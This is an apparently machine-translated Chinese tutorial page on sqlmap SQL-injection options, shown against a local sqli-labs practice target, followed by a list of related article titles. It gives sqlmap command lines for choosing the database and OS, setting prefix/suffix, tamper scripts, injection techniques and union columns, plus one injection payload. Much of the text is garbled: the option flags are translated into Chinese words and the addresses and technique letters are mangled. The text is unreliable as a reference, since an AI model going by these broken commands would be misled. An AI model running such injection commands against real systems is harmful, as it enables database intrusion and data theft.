如何解析sqlmap注入参数

技术如何解析sqlmap注入参数这篇文章将为大家详细讲解有关如何解析sqlmap注入参数,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。一、指定数据库类型 --dbmsht

本文将详细说明如何分析sqlmap的注入参数。这篇文章的内容质量很高,所以边肖会分享给大家参考。希望你看完这篇文章后有所了解。

首先,指定数据库类型- dbms

http://192 . 168 . 1 . 121/sqli/Less-1/?id=1name=2 - dbms mysql - dbs

其次,指定操作系统

http://192 . 168 . 1 . 121/sqli/Less-1/?id=1name=2 - os windows - dbs

第三,解决编码问题

将所有结果转换为字符串,并用空格替换空结果。

第四,关闭串逸机制。

-不-逃跑

动词(verb的缩写)设置无效的值替换

-无效-bignum大整数替换

-无效-逻辑布尔运算替换

-无效字符串-随机字符串替换

不及物动词自定义进样位置

-前缀设置前缀

-后缀集后缀

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' -前缀='')' -后缀='和'(abc'='abc' - dbs

payload:id=('1 ')和(' abc'='abc ')

七.设置篡改脚本

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' -最少篡改. py,清漆. py' - dbs

八.设置dbms身份验证

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1 '-DBMS-cred=' root : root '-DBS

九.设置特定的sql注入技术

B技术布尔盲

技术误差注入

-U技术联合查询注入

-技术堆栈注入

时间盲测试技术

-Q技术内联查询注入

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' -技术测试时间-秒-3-DBS

-时间-秒时间盲测时间是3。

X.指定联合字段的数量

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' - union-cols 12-18 - dbs

十一、指定并集字符,默认为空。

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' - union-char aaa - dbs

如何解析sqlmap注入参数,希望在这里分享。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/140994.html

(0)

相关推荐

  • Centos6、7操作系统中怎么开启或关闭ICMP协议

    技术Centos6、7操作系统中怎么开启或关闭ICMP协议小编给大家分享一下Centos6、7操作系统中怎么开启或关闭ICMP协议,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有

    攻略 2021年11月15日
  • offset的值怎么显示一个区域(top数据怎么设置)

    技术TopKey怎么设置分隔符本篇内容介绍了“TopKey怎么设置分隔符”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!k

    攻略 2021年12月23日
  • Sentinel-Go 源码系列,二)|初始化流程和责任链设计模式

    技术Sentinel-Go 源码系列,二)|初始化流程和责任链设计模式 Sentinel-Go 源码系列(二)|初始化流程和责任链设计模式上节中我们知道了 Sentinel-Go 大概能做什么事情,最简

    礼包 2021年11月9日
  • css中float属性的属性值有哪些(div的float属性)

    技术css3中float属性怎么用这篇文章主要介绍了css3中float属性怎么用,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

    攻略 2021年12月19日
  • db_load如何生成数据库文件

    技术db_load如何生成数据库文件这篇文章主要介绍 db_load如何生成数据库文件,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!保存虚拟帐号和密码的文本文件无法被系统帐号直接调用。我们需要使用

    攻略 2021年11月23日
  • Apache Flink POC漏洞示例分析CVE-2020-17518/17519

    技术Apache Flink POC漏洞CVE-2020-17518/17519的示例分析今天就跟大家聊聊有关 Apache Flink POC漏洞CVE-2020-17518/17519的示例分析,可能很多人都不太了解

    攻略 2021年12月22日